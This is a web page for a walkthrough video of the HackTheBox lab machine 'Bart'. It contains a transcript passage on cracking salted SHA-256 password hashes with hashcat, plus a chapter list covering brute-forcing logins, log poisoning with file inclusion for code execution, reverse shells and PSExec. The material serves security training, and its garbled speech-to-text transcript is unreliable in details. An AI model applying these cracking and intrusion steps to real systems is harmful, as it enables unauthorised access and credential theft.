let's just look at what that is okay we got validate password right here it's going to trim it it has this salt and then it's doing the sha-256 some of passwd then the salt so if we want to crack this in hash cat it is possible so let us we don't need a HTTP server anymore it's SSH to my Kraken box and you could probably use hash cat on your box I just have a spare box to use hash cat so that's why I use it from so if we go in hash cat we can create a thing well we can look at hash cat first dot slash hash cat - H grabbed SR sha-256 and look at the options we have 14 10 which is sha 286 pass with an insult 14:20 sha 256 salt than the password we definitely want 1410 the password than the salt so to do it this way we do V hashes slat hash is just the directory and we'll call this what we want to call this but dot internal case this again because I change the casing and we have to go back and grab all the passwords so we've put them in creds grab this paste this get rid of this then we want to copy this and paste it so it's just password : the salt that's the format and you have to do it for each line and then you could do dot slash hash cat - am 1410 then the hash file which will be hashes for internal then we can probably do the word list which I have opted word list Rahil and this should run relatively quickly because it's just shot 256 sums and we got one this hash came out to password one so let's see who that was that was probably her V since we found that one via cracking it Harvey and let's search yep so that's that that is the box apologies for all the random errors we had before I really thought it would be easier to do a run as spawn as a user turns out it's not too easy on this box and I that's just me being an idiot or it's just we're in really weird permissions on the box and yeah so leaving it in the video so you can see how I approach attempting to do that and I swear I've done it before so I know those methods generally work not sure why they weren't working but the fact that it didn't work with invoke run as Empire and Metasploit I don't know if it's I don't think it's me airing out I think I did decent troubleshooting and yeah so take care guys I'll see you next week

Original Description

01:54 - Begin Recon, Windows IIS/OS Mapping and GoBuster 05:20 - Explanation of Virtual Host Routing 09:50 - Developers name exposed in HTML Source, also discover /monitor 11:10 - Enumerating Username in PHP Server Monitor: Challenge Watch Sense to und erstand CSRF and write an automated bruteforcer 16:33 - Discover of Internal-01.bart.htb 19:17 - Harveys Password with Hydra (Note: This is bypassable if you DIRBUST to find /Log/log.php) 29:34 - Finally got Hydra to return the password! 32:20 - Log Poisoning + LFI = Remote Code Execution 37:30 - Return of Reverse Shell 41:30 - Why you should check if you're a 32-bit process on a 64-bit machine ### Start of Failing attempting to do a RunAs... Lol. 48:35 - Attempting to use b33f/FuzzySecurity Invoke-RunAs 56:00 - Mistake with Invoke-RunAs is probably pointing it to the wrong port. D: 01:03:40 - ARGH! Lets try to use this account via Empire 01:11:00 - Bring out the big guns, it's Metasploit Time! 01:18:10 - Alright, lets poke a hole in the firewall and connect over SMB! 01:21:17 - Failed to PSExec in MSF ### End of Failing! 01:21:40 - Found Impacket-PSExec! And it works! ### Box Done 01:23:45 - Lets go hunt for creds! 01:35:23 - Cracking Salted Hashes with Hashcat (Sha265.Salt)
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 48 of 60

1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches viewers how to use various tools and techniques to exploit vulnerabilities in a Windows IIS server and gain administrative access. It covers topics like web application security, brute-force attacks, and password cracking.

Key Takeaways
  1. Run GoBuster to enumerate the directory list
  2. Use Hydra to brute-force login credentials
  3. Intercept requests using Burp Suite
  4. Use Metasploit to exploit vulnerabilities
  5. Crack passwords using Hashcat
💡 The video highlights the importance of using a combination of tools and techniques to exploit vulnerabilities in web applications and gain administrative access.

Related Reads

Chapters (19)

1:54 Begin Recon, Windows IIS/OS Mapping and GoBuster
5:20 Explanation of Virtual Host Routing
9:50 Developers name exposed in HTML Source, also discover /monitor
11:10 Enumerating Username in PHP Server Monitor: Challenge Watch Sense to und
16:33 Discover of Internal-01.bart.htb
19:17 Harveys Password with Hydra (Note: This is bypassable if you DIRBUST to find /
29:34 Finally got Hydra to return the password!
32:20 Log Poisoning + LFI = Remote Code Execution
37:30 Return of Reverse Shell
41:30 Why you should check if you're a 32-bit process on a 64-bit machine
48:35 Attempting to use b33f/FuzzySecurity Invoke-RunAs
56:00 Mistake with Invoke-RunAs is probably pointing it to the wrong port. D:
1:03:40 ARGH! Lets try to use this account via Empire
1:11:00 Bring out the big guns, it's Metasploit Time!
1:18:10 Alright, lets poke a hole in the firewall and connect over SMB!
1:21:17 Failed to PSExec in MSF
1:21:40 Found Impacket-PSExec! And it works!
1:23:45 Lets go hunt for creds!
1:35:23 Cracking Salted Hashes with Hashcat (Sha265.Salt)
Up next
Best VPN For China 2026 — Which One Actually Works?
Tutorial Stack
Watch →